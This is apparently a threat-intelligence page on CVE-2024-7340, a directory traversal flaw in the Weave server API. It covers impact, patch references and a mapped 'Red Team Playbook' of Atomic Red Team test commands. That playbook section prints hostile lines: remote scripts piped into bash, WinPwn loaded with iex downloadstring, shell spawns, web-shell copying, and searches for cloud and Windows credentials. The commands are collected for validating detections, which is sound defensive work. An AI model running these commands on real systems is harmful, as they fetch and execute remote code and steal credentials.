CVE-2024-7340
Overview
This vulnerability is a directory traversal flaw caused by insufficient input validation in the Weave server API. The affected component improperly sanitizes user-supplied file path parameters, enabling traversal outside the intended directory scope. This allows unauthorized access to arbitrary files on the server filesystem through the file-fetching API endpoint.
Vulnerability Description
The Weave server API allows remote users to fetch files from a specific directory, but due to a lack of input validation, it is possible to traverse and leak arbitrary files remotely. In various common scenarios, this allows a low-privileged user to assume the role of the server admin.
Impact
An attacker with low privileges and network access can exploit this vulnerability to read arbitrary files on the server, including sensitive configuration or credential files. This can lead to privilege escalation, allowing the attacker to assume the role of the server administrator. The attack requires no user interaction and leverages network access (CVSS vector AV:N/AC:L/PR:L/UI:N), resulting in high confidentiality, integrity, and availability impact (C:H/I:H/A:H).
Solution
Apply the patch provided in the wandb/weave GitHub repository pull request #1657, which corrects input validation in the file-fetching API endpoint. Refer to the advisory published by JFrog Research (JFSA-2024-001039248) for detailed patch instructions and mitigation guidance. Ensure deployment of the updated Weave server version that includes this fix to eliminate the directory traversal vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Weave server API arises from inadequate input validation, which allows remote users to exploit directory traversal flaws. This weakness enables attackers to manipulate file paths, granting them unauthorized access to sensitive files stored on the server. By crafting specific requests, an attacker can traverse the file system beyond the intended directory, potentially accessing configuration files, user data, or other critical resources. The lack of proper checks on user input means that even low-privileged users can exploit this flaw, effectively elevating their access rights to that of an administrator.
Exploitation of this vulnerability can occur through various attack vectors, primarily involving crafted HTTP requests that target the API endpoints responsible for file retrieval. An attacker could leverage tools such as curl or custom scripts to send requests that include directory traversal sequences (e.g., "../") to access files outside the designated directory. In scenarios where the server is misconfigured or lacks adequate security measures, the attacker may successfully retrieve sensitive information, including credentials, API keys, or proprietary data. This exploitation can be executed remotely, making it particularly dangerous as it does not require physical access to the server or a high level of privilege.
The real-world impact of this vulnerability is significant, posing substantial business risks. Organizations that utilize the Weave server API may find themselves exposed to data breaches, leading to financial losses, reputational damage, and regulatory penalties. The potential for a low-privileged user to gain administrative access can result in unauthorized modifications to critical systems, further exacerbating the situation. Additionally, the leaked information could be used for further attacks, such as phishing campaigns or credential stuffing, amplifying the overall risk landscape for affected organizations.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regular security assessments, including penetration testing and code reviews, can help identify and remediate input validation flaws before they are exploited. Employing web application firewalls (WAFs) can provide an additional layer of protection by filtering out malicious requests that attempt directory traversal. Furthermore, organizations should enforce the principle of least privilege, ensuring that users have only the access necessary for their roles. This can help limit the potential damage caused by a successful exploitation of the vulnerability.
In conclusion, the vulnerability present in the Weave server API underscores the critical importance of robust input validation and access controls in web applications. The potential for remote exploitation by low-privileged users highlights the need for organizations to prioritize security in their development practices and operational procedures. By adopting comprehensive detection and mitigation strategies, businesses can significantly reduce their exposure to such vulnerabilities and safeguard their sensitive data against unauthorized access.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2024-7340, with our telemetry indicating the first confirmed sighting of exploitation attempts in the wild. Although the EPSS score remains stable and below high exploitation probability thresholds, this initial detection signals a transition from theoretical risk to active targeting. The emergence of exploitation attempts, even at low volume, elevates the urgency for defenders to monitor this vulnerability closely, as it demonstrates adversaries’ growing interest in leveraging the Weave server API’s input validation flaw to escalate privileges. While no new exploit variants have been documented, the presence of active scanning or probing suggests that threat actors are validating attack vectors, potentially as a precursor to broader campaign deployment. Consequently, the threat level for CVE-2024-7340 should be considered heightened from a latent to an active exploitation phase, warranting increased vigilance despite the absence of widespread exploitation evidence.
Affected Products
No CPE information available.
Exploits
No exploits found for this CVE.
Threat Feed
1 eventsSighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-7340 |
| research.jfrog.com |
GitHub CVE
third-party-advisory
|
https://research.jfrog.com/vulnerabilities/wandb-weave-server-remote-arbitrary-file-leak-jfsa-2024-001039248/ |
| github.com |
GitHub CVE
patch
|
https://github.com/wandb/weave/pull/1657 |